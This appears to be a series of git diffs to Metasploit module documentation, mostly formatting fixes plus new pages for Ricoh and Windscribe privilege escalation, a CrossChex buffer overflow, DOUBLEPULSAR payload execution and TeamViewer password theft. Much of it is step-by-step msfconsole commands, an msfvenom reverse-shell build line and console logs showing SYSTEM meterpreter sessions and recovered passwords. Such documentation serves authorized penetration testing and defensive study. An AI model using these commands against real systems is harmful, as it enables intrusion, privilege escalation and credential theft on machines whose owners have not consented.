 **IMPORTANT:** The target IIS machine must meet these conditions to be considered as exploitable:

@@ -8,7 +8,7 @@ This module can be used to execute a payload on IIS servers that have world-writ
 2. It allows Read and Write permission.
 3. It supports ASP.

-## WebDAV
+### WebDAV

 Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol (HTTP) that allows clients to perform remote Web content authoring operations. WebDAV is defined in RFC 4918 by a working group of the Internet Engineering Task Force.

@@ -16,10 +16,10 @@ Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hyperte

 1. Do: ```use exploit/windows/iis/iis_webdav_upload_asp```
 2. Do: ```set payload windows/meterpreter/reverse_tcp```
-2. Do: ```set LHOST [IP]```
-3. Do: ```set RHOST [IP]```
-3. Do: ```set PATH / [PATH]```
-4. Do: ```run```
+3. Do: ```set LHOST [IP]```
+4. Do: ```set RHOST [IP]```
+5. Do: ```set PATH / [PATH]```
+6. Do: ```run```

 ## Scenarios

@@ -1,4 +1,6 @@
-## Introduction
+## Vulnerable Application
+
+### Introduction

  This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
  the current user hive, and inserting a custom command that will get invoked when
@@ -14,12 +16,11 @@

 ## Usage

-  You'll first need to obtain a session on the target system.  
+  You'll first need to obtain a session on the target system.
  Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options.
  The module use an hardcoded timeout of 5 seconds during which it expects fodhelper.exe to be launched on the target system.
  On slower system this may be too short, resulting in no session being created. In this case disable the automatic payload handler (`set DISABLEPAYLOADHANDLER true`)
  and manually create a job handler corresponding to the payload.
-  

 ## Scenarios

@@ -1,10 +1,10 @@
 ## Introduction

-This module will bypass UAC on any Windows installation with Powershell installed. 
+This module will bypass UAC on any Windows installation with Powershell installed.

 There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
 When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
-%windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must 
+%windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must
 be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog.

 ## Usage
@@ -9,13 +9,13 @@

  The module modifies the registry in order for this exploit to work. The modification is
  reverted once the exploitation attempt has finished.
-	
+
  The module does not require the architecture of the payload to match the OS. If
  specifying EXE::Custom your DLL should call ExitProcess() after starting the
  payload in a different process.

 ## Usage
-	
+
  1. First we need to obtain a session on the target system.
  2. Load module: `use exploit/windows/local/bypassuac_sluihijack`
  3. Set the `payload`: `set payload windows/x64/meterpreter/reverse_tcp`
@@ -5,7 +5,7 @@ is run with the "autoElevate" property set to true, and it will automatically
 launch a file from a low-privilege registry location with elevated privileges.
 To bypass, simply place the binary on disk, write its location in the
 correct registry key, and run WSReset.exe.  The binary will be run with elevated
-privileges. 
+privileges.

 ## Usage

@@ -1,34 +1,38 @@
 ## Introduction
-  This module will abuse the SeImperonsate privilege commonly found in 
-services due to the requirement to impersonate a client upon 
-authentication. As such it is possible to impersonate the SYSTEM account 
-and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM 
-attack at which intercepts the hash and relay responses from RPC to be 
-able to establish a handle to a new SYSTEM token. Some caveats : Set 
-your target option to match the architecture of your Meterpreter 
-session, else it will inject the wrong architecture DLL into the process 
-of a seperate architecture. Additionally, after you have established a 
+
+  This module will abuse the SeImperonsate privilege commonly found in
+services due to the requirement to impersonate a client upon
+authentication. As such it is possible to impersonate the SYSTEM account
+and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM
+attack at which intercepts the hash and relay responses from RPC to be
+able to establish a handle to a new SYSTEM token. Some caveats : Set
+your target option to match the architecture of your Meterpreter
+session, else it will inject the wrong architecture DLL into the process
+of a seperate architecture. Additionally, after you have established a
 session, you must use incognito to imperonsate the SYSTEM Token.

 ## Build Instructions
+
 This builds using visual studio 2017 and tools v141.  Attempts
 to compile with previous verstions of build tools will succeed but
 the resulting binary fails to exploit the vulnerability.

 ## Usage
+
  You'll first need to obtain a session on the target system.
-  Next, once the module is loaded, one simply needs to set the 
+  Next, once the module is loaded, one simply needs to set the
 ```payload``` and ```session``` options, in addition to architecture.
-  
-  Your user at which you are trying to exploit must have `SeImpersonate` 
+
+  Your user at which you are trying to exploit must have `SeImpersonate`
 privileges.
-  
-  The module has a hardcoded timeout of 20 seconds, as the attack may 
-not work immediately and take a few seconds to start. Also, check to 
-make sure port 6666 is inherently not in use else the exploit will not 
-run properly
-  
+
+  The module has a hardcoded timeout of 20 seconds, as the attack may
+not work immediately and take a few seconds to start. Also, check to
+make sure port 6666 is inherently not in use else the exploit will not
+run properly.
+
 ## Scenarios
+
 ```
  Name Current Setting Required Description
   ---- --------------- -------- -----------
@@ -1,27 +1,30 @@
 ## Introduction
-  This module will abuse the SeImperonsate privilege commonly found in 
-services due to the requirement to impersonate a client upon 
-authentication. As such it is possible to impersonate the SYSTEM account 
-and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM 
-attack at which intercepts the hash and relay responses from RPC to be 
-able to establish a handle to a new SYSTEM token. Some caveats : Set 
-your target option to match the architecture of your Meterpreter 
-session, else it will inject the wrong architecture DLL into the process 
-of a seperate architecture. Additionally, after you have established a 
+
+  This module will abuse the SeImperonsate privilege commonly found in
+services due to the requirement to impersonate a client upon
+authentication. As such it is possible to impersonate the SYSTEM account
+and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM
+attack at which intercepts the hash and relay responses from RPC to be
+able to establish a handle to a new SYSTEM token. Some caveats : Set
+your target option to match the architecture of your Meterpreter
+session, else it will inject the wrong architecture DLL into the process
+of a seperate architecture. Additionally, after you have established a
 session, you must use incognito to imperonsate the SYSTEM Token.
+
 ## Usage
+
  You'll first need to obtain a session on the target system.
-  Next, once the module is loaded, one simply needs to set the 
+  Next, once the module is loaded, one simply needs to set the
 ```payload``` and ```session``` options, in addition to architecture.
-  
-  Your user at which you are trying to exploit must have `SeImpersonate` 
+
+  Your user at which you are trying to exploit must have `SeImpersonate`
 privileges.
-  
-  The module has a hardcoded timeout of 20 seconds, as the attack may 
-not work immediately and take a few seconds to start. Also, check to 
-make sure port 6666 is inherently not in use else the exploit will not 
+
+  The module has a hardcoded timeout of 20 seconds, as the attack may
+not work immediately and take a few seconds to start. Also, check to
+make sure port 6666 is inherently not in use else the exploit will not
 run properly
-  
+
 ## Scenarios
 ```
  Name Current Setting Required Description
@@ -1,8 +1,10 @@
 ## Vulnerable Application

-  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
+  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/)
+  or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).

-  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
+  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I 32bit meterpreter seems to get caught,
+  so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.

  The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.

@@ -11,8 +13,6 @@

 ## Verification Steps

-  Example steps in this format:
-
  1. Install the application
  2. Wait for `C:\ProgramData\Panda Security\Panda Devices Agent\Downloads` folder to appear
  3. Start msfconsole
@@ -28,7 +28,7 @@
  **DLL**

  Which DLL to name our payload.  The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used.  However the dll seems to be VERY picky.  Default is cryptnet.dll.  See the chart for more details.
-  
+
 |                                           | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
 |---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
 | 64bit target (1), win10 x64 | CRASH | CRASH | NO |  NO       | valid     |    no |
@@ -38,9 +38,9 @@
 | 32bit target (0), win7sp1 x86 |  |  | valid |       | valid (caught by av)     |     |

 In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSEvents didn't crash, but no session was obtained.  `valid` means we got a shell.
-  
+
  **ListenerTimeout**
-  
+
  How long to wait for a shell.  PSEvents.exe runs every hour or so, so the default is 3610 (10sec to account for code execution or other things)

 ## Scenarios
@@ -48,7 +48,7 @@ In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSE
 ### Windows 8.1 x86 with Panda Antirivus Pro 2016 16.1.2

  Step 1, get a local shell.  I used msfvenom to drop an exe for easy user level meterpreter.
-  
+
    msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
    
    msf > use exploit/multi/handler 
@@ -0,0 +1,97 @@
+## Vulnerable Application
+
+  [Various Ricoh printer drivers](https://www.ricoh.com/info/2020/0122_1/list) allow escalation of
+  privileges on Windows systems.
+
+  For vulnerable drivers, a low-privileged user can
+  read/write files within the `RICOH_DRV` directory
+  and its subdirectories.
+
+  `PrintIsolationHost.exe`, a Windows process running
+  as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
+  during the installation of a printer. A user can
+  elevate to SYSTEM by writing a malicious DLL to
+  the vulnerable driver directory and adding a new
+  printer with a vulnerable driver.
+
+  Multiple runs of this module may be required
+  given successful exploitation is time-sensitive.
+
+## Verification Steps
+
+  1. Install a vulnerable Ricoh driver
+  2. Start msfconsole
+  3. Get a session with basic privileges
+  4. Do: ```use exploit/windows/local/ricoh_driver_privesc```
+  5. Do: ```set SESSION <sess_no>```
+  6. Do: ```run```
+  7. You should get a shell running as SYSTEM.
+
+## Scenarios
+
+### Tested on Ricoh PCL6 Universal Driver `v4.13`
+
+  ```
+  msf5 > use multi/handler
+  msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Sending stage (206403 bytes) to 192.168.37.199
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.199:49670) at 2020-02-06 12:47:59 -0600
+
+  meterpreter > getuid
+  Server username: DESKTOP-A97LIDN\ricoh-test
+  meterpreter > sysinfo
+  Computer        : DESKTOP-A97LIDN
+  OS              : Windows 10 (10.0 Build 16299).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  meterpreter > background
+  [*] Backgrounding session 1...
+  msf5 exploit(multi/handler) > use ricoh_driver_privesc
+
+  Matching Modules
+  ================
+
+     #  Name                                        Disclosure Date  Rank    Check  Description
+     -  ----                                        ---------------  ----    -----  -----------
+     0  exploit/windows/local/ricoh_driver_privesc  2020-01-22       normal  Yes    Ricoh Driver Privilege Escalation
+
+
+  [*] Using exploit/windows/local/ricoh_driver_privesc
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set session 1
+  session => 1
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(windows/local/ricoh_driver_privesc) > check
+  [*] The target appears to be vulnerable. Ricoh driver directory has full permissions
+  msf5 exploit(windows/local/ricoh_driver_privesc) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Adding printer JLFJCi...
+  [*] Sending stage (206403 bytes) to 192.168.37.199
+  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.199:49673) at 2020-02-06 12:48:40 -0600
+  [*] Deleting printer JLFJCi
+  [+] Deleted C:\Users\RICOH-~1\AppData\Local\Temp\GFHCkvh.bat
+  [+] Deleted C:\Users\RICOH-~1\AppData\Local\Temp\headerfooter.dll
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo
+  Computer        : DESKTOP-A97LIDN
+  OS              : Windows 10 (10.0 Build 16299).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  ```
@@ -0,0 +1,81 @@
+## Description
+
+  The Windscribe VPN client application for Windows makes use of a
+  Windows service `WindscribeService.exe` which exposes a named pipe
+  `\\.\pipe\WindscribeService` allowing execution of programs with
+  elevated privileges.
+
+  Windscribe versions prior to 1.82 do not validate user-supplied
+  program names, allowing execution of arbitrary commands as SYSTEM.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on [Windscribe](https://windscribe.com/)
+  version 1.80 and 1.81 on Windows 7 SP1 (x64).
+
+  Download:
+
+  * https://assets.windscribe.com/desktop/win/Windscribe_1.80.exe
+  * https://assets.windscribe.com/desktop/win/Windscribe_1.81.exe
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/windows/local/windscribe_windscribeservice_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *SYSTEM* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `%TEMP%`)
+
+
+## Scenarios
+
+### Windows 7 SP1 (x64)
+
+  ```
+  msf5 > use exploit/windows/local/windscribe_windscribeservice_priv_esc 
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > check
+  [*] The service is running, but could not be validated.
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Writing payload (283 bytes) to C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe ...
+  [*] Sending C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe to \\.\pipe\WindscribeService ...
+  [+] Opended \\.\pipe\WindscribeService! Proceeding ...
+  [*] Sending stage (180291 bytes) to 172.16.191.242
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49365) at 2020-01-31 19:14:31 -0500
+  [-] Failed to delete C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe: stdapi_fs_delete_file: Operation failed: Access is denied.
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo
+  Computer        : TEST
+  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  meterpreter >
+  ```
+
@@ -1,14 +1,15 @@
 ## Vulnerable Application
+
  Ahsay Backup v7.x - v8.1.1.50
  Download the vulnerable version: `http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe`
  Start the application ( I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`)
-  
+
 ## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/windows/misc/ahsay_fileupload`
  3. enable create trial account `set CREATEACCOUNT true`
-  4. set RHOST `set RHOST 172.16.238.175` 
+  4. set RHOST `set RHOST 172.16.238.175`
  5. set LHOST `set LHOST 172.16.238.235`
  6. run exploit `run`
  7. We should receive a meterpreter shell.
@@ -22,12 +23,10 @@
   TARGETURI      - Path to Ahsay installation
   UPLOADPATH     - Path to where the file should be uploaded
   USERNAME       - Username to Ahsay account, if CREATEACCOUNT is set this username will be used.
-   
+
 ## Scenarios

-### Version of software and OS as applicable
-
-This exploit has been tested on Windows 2003 SP2.
+### Ahsay 8.1.1.50 on Windows 2003 SP2

  ```
 msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
@@ -38,17 +38,16 @@
  6. `run`
  7. **Verify** Session opened

-
 ## Scenarios

-    msf5 > use exploit/windows/misc/ais_esel_server_rce 
+    msf5 > use exploit/windows/misc/ais_esel_server_rce
    msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
    rhosts => 10.66.75.212
          msf5 exploit(windows/misc/ais_esel_server_rce) > check
          [+] 10.66.75.212:5099 - The target is vulnerable.
    msf5 exploit(windows/misc/ais_esel_server_rce) > run

-    [*] Started reverse TCP handler on 10.66.75.208:4444 
+    [*] Started reverse TCP handler on 10.66.75.208:4444
    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
    [*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)
@@ -0,0 +1,57 @@
+## Introduction
+
+CrossChex is a personnel identity verification, access control, and time attendance management system compatible with Windows 7,8 & 10. It uses UDP broadcasts to identify and connect with Access Control devices on a network. The code used to handle a response from an Access Control device is vulnerable to a Stack Buffer Overflow attack on CrossChex versions `Crosschex Standard x86 <= V4.3.12`. Tracked as CVE-2019-12518, and as such permits abritrary code execution.
+
+The code used to overflow the Stack Buffer and code an attacker wishes to be executed as a result of the exploit are sent in a single UDP packet as a response to the CrossChex broadcast. As both the exploit and the payload must be contained inside a single UDP packet, an exploit has a maximum size of `8947 Characters`.    
+
+This module exploits CVE-2019-12518 by listening for a CrossChex "new device" broadcast for a given number of seconds (`TIMEOUT`). It then responds with a UDP packet containing shellcode for both the Buffer Overflow exploit and the attacker's chosen payload. The `Space` payload option ensures no payload of too large a size is used to ensure successful explotation. If a broadcast is not detected within the given `TIMEOUT`, the module exits with a warning. 
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use windows/misc/crosschex_device_bof`
+3. `set LHOST vboxnet0`
+4. `run`
+5. Open CrossChex
+6. Navigate to Device > Add
+7. Select `Search`
+8. Verify payload executes correctly
+
+## Options
+
+1.  `TIMEOUT` Seconds module waits for broadcast, defaults to `1000`.
+2.  `CHOST`. Address UDP packet response is sent from. Defaults to `0.0.0.0`.
+3.  `CPORT`. Port UDP packet response is sent from. Defaults to `5050` as CrossChex expects communication from this port.
+
+## Compatible Payloads
+
+Any basic x86 windows payload.
+
+## Payload Options
+As above.
+
+## Scenarios
+
+```
+msf5 exploit(windows/misc/crosschex_device_bof) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] CrossChex broadcast received, sending payload in response
+[*] Payload sent
+[*] Sending stage (180291 bytes) to 192.168.56.3
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49160) at 2020-02-10 16:21:13 +0000
+
+meterpreter > ls
+Listing: C:\Program Files\Anviz\CrossChex Standard
+==================================================
+...
+
+
+
+```
+
+## References
+
+1. <https://cvedetails.com/cve/CVE-2019-12518>
+2. <https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html>
+3. <https://www.exploit-db.com/exploits/47734>
@@ -2,7 +2,7 @@

  This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
  This vulnerability can allow remote code execution in the context of the user who ran it.
-  
+
  A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)

 ## Verification Steps
@@ -17,7 +17,7 @@
 ## Options

  **MAGIC**
-  
+
  This is the 5 character magic used by the server.  The default is `Gh0st`

 ## Scenarios
@@ -1,15 +1,15 @@
+## Vulnerable Application
+
 HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)

-This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also 
-HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely. 
+This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also
+HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely.
 The service is vulnerable provided the Secure Channel feature is disabled (default).

 During testing, additional versions were verified to be vulnerable.  The following list documents them:

 - HP LoadRunner 12.53 Community Edition (non-default SSL turned off)

-## Vulnerable Application
-
 HP LoadRunner 9.50 or below, or a version documented above.

 ## Verification Steps
@@ -2,7 +2,7 @@

  This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message.
  This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
-  
+
  A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)

 ## Verification Steps
@@ -0,0 +1,99 @@
+## Introduction
+
+This module executes a Metasploit payload against the Equation Group's
+DOUBLEPULSAR implant for RDP.
+
+While this module primarily performs code execution against the implant,
+the `Neutralize implant` target allows you to disable the implant.
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Execute payload (x64)
+1   Neutralize implant
+```
+
+## Options
+
+**DefangedMode**
+
+Set this to `false` to disable defanged mode and enable module
+functionality. Set this only if you're SURE you want to proceed.
+
+**ProcessName**
+
+Set this to the userland process you want to inject the payload into.
+Defaults to `spoolsv.exe`.
+
+## Usage
+
+Pinging the implant:
+
+```
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check
+
+[*] 192.168.56.115:3389 - Verifying RDP protocol...
+[*] 192.168.56.115:3389 - Attempting to connect using TLS security
+[*] 192.168.56.115:3389 - Swapping plain socket to SSL
+[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
+[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
+[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
+[+] 192.168.56.115:3389 - The target is vulnerable.
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
+```
+
+Executing a payload:
+
+```
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Execute\ payload
+target => Execute payload
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.115:3389 - Verifying RDP protocol...
+[*] 192.168.56.115:3389 - Attempting to connect using TLS security
+[*] 192.168.56.115:3389 - Swapping plain socket to SSL
+[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
+[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
+[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
+[*] 192.168.56.115:3389 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
+[*] 192.168.56.115:3389 - Total shellcode length: 4096 bytes
+[*] 192.168.56.115:3389 - Sending shellcode to DOUBLEPULSAR
+[*] Sending stage (206403 bytes) to 192.168.56.115
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-11-25 18:10:21 -0600
+[+] 192.168.56.115:3389 - Payload execution successful
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-S7TDBIENPVM
+OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter >
+```
+
+Neutralizing the implant:
+
+```
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Neutralize\ implant
+target => Neutralize implant
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.115:3389 - Verifying RDP protocol...
+[*] 192.168.56.115:3389 - Attempting to connect using TLS security
+[*] 192.168.56.115:3389 - Swapping plain socket to SSL
+[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
+[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
+[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
+[*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR
+[+] 192.168.56.115:3389 - Implant neutralization successful
+[*] Exploit completed, but no session was created.
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
+```
@@ -29,7 +29,6 @@ More information available at [Gotham Digital Science Security](https://blog.gds

  Share name (Default: Random)

-
 ## Scenarios

 ### Domain Group Policy
@@ -41,7 +40,7 @@ In this scenario, the following computers are present:

 The module sets up the SMB share and VBScript file. Out of band (outside the scope of this module or docs) a Group Policy is simply applied to the `OU` computer container.
 Next, the Win 7 box grabs the payload, in this case the meterpreter reverse_tcp stager on boot, with `SYSTEM` privs because its executed as a start up script.
-Theoretically, any computer in that `OU` would also execute the script on started up. 
+Theoretically, any computer in that `OU` would also execute the script on started up.

  ```
  msf > use modules/exploits/windows/smb/group_policy_startup
@@ -11,7 +11,7 @@ the `Neutralize implant` target allows you to disable the implant.
 ```
 Id  Name
 --  ----
-0   Execute payload
+0   Execute payload (x64)
 1   Neutralize implant
 ```

@@ -32,22 +32,22 @@ Defaults to `spoolsv.exe`.
 Pinging the implant:

 ```
-msf5 exploit(windows/smb/doublepulsar_rce) > check
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > check

 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
 [*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
 [*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
 [!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
 [+] 192.168.56.115:445 - The target is vulnerable.
-msf5 exploit(windows/smb/doublepulsar_rce) >
+msf5 exploit(windows/smb/smb_doublepulsar_rce) >
 ```

 Executing a payload:

 ```
-msf5 exploit(windows/smb/doublepulsar_rce) > set target Execute\ payload
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > set target Execute\ payload
 target => Execute payload
-msf5 exploit(windows/smb/doublepulsar_rce) > run
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > run

 [*] Started reverse TCP handler on 192.168.56.1:4444
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
@@ -78,9 +78,9 @@ meterpreter >
 Neutralizing the implant:

 ```
-msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > set target Neutralize\ implant
 target => Neutralize implant
-msf5 exploit(windows/smb/doublepulsar_rce) > run
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > run

 [*] Started reverse TCP handler on 192.168.56.1:4444
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
@@ -90,5 +90,5 @@ msf5 exploit(windows/smb/doublepulsar_rce) > run
 [*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR
 [+] 192.168.56.115:445 - Implant neutralization successful
 [*] Exploit completed, but no session was created.
-msf5 exploit(windows/smb/doublepulsar_rce) >
+msf5 exploit(windows/smb/smb_doublepulsar_rce) >
 ```
@@ -1,9 +1,9 @@
 ## Vulnerable Application

-WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). 
+WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol).
 This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.

-**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. 
+**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return.

 ## Example Usage

@@ -0,0 +1,40 @@
+## Vulnerable Application
+
+  Any Windows host with a `meterpreter` session and TeamViewer 7+
+  installed. The following passwords will be searched for and recovered:
+  
+  * Options Password -- All module-supported TeamViewer versions (7+)
+  * Unattended Password -- TeamViewer versions 7 - 9
+  * License Key -- TeamViewer versions 7 - 14
+  
+### Installation Steps
+
+  1. Download the latest installer of TeamViewer.
+  2. Select "Custom Install With Unattended Password" during
+    installation
+  3. After installation, navigate to
+    `Extra > Options > Security > Advanced > Show Advanced Settings` and
+    set the "Options Password"
+    * Options can also be exported to a .reg file from here.
+
+## Verification Steps
+
+  1. Get a `meterpreter` session on a Windows host.
+  2. Do: ```run post/windows/gather/credentials/teamviewer_passwords```
+  3. If the system has registry keys for TeamViewer passwords they will be printed out.
+
+## Options
+
+  None.
+
+## Scenarios
+
+```
+meterpreter > run post/windows/gather/credentials/teamviewer_passwords 
+
+[*] Finding TeamViewer Passwords on WEQSQUGO-2156
+[+] Found Exported Unattended Password: P@$$w0rd
+[+] Found Options Password: op*****5
+[+] Passwords stored in: /home/blurbdust/.msf4/loot/20200207052401_default_***.***.***.***_host.teamviewer__588749.txt
